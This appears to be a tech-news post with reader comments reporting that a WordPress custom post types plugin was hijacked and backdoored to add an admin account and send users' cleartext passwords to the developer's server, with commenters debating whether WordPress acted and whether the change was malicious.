WordPress Plugin Comes With a Backdoor, Steals Admin Credentials In Cleartext

An anonymous reader writes that a WordPress plugin for managing custom post types has apparently been forcibly taken over by an Indian developer who has added a backdoor to the code which lets him install files on infected sites. "This backdoor also allows him to download files which add his own admin account to the site, and even alter core WordPress files so every time a user logs in, edits his profile, or a new user account is created, the user's password is collected (in cleartext) and sent to his server. WordPress hasn't moved in to ban the plugin just yet, despite user complaints.

plugin has been suppressed from the wordpress site

[Herve5]

I find the info quite aggressive agains WP, the plugin indeed has been banned, and before this second post...

This took longer to happen than I thought

[dbIII]

Seriously guys, I know it's the quick and lazy way to put together a website but it's obvious that this sort of thing is going to happen in that creaking pile of php intentional or otherwise.

Re:Chill. It's just a buggy update feature.

Jesus man, RTFA once in a while. It's completely, 100%, malicious intent. It adds a admin user to the site with the devs name/group name, and in case he couldn't login he used the backdoor to upload custom php script onto the installation to modify the wp-options file.

When is the last time you've "accidentally" introduced a bug that send all user logins to a server in India in cleartext by mistake? Does the fact that this plugin was dead for a year and suddenly has this new superpower not worry you?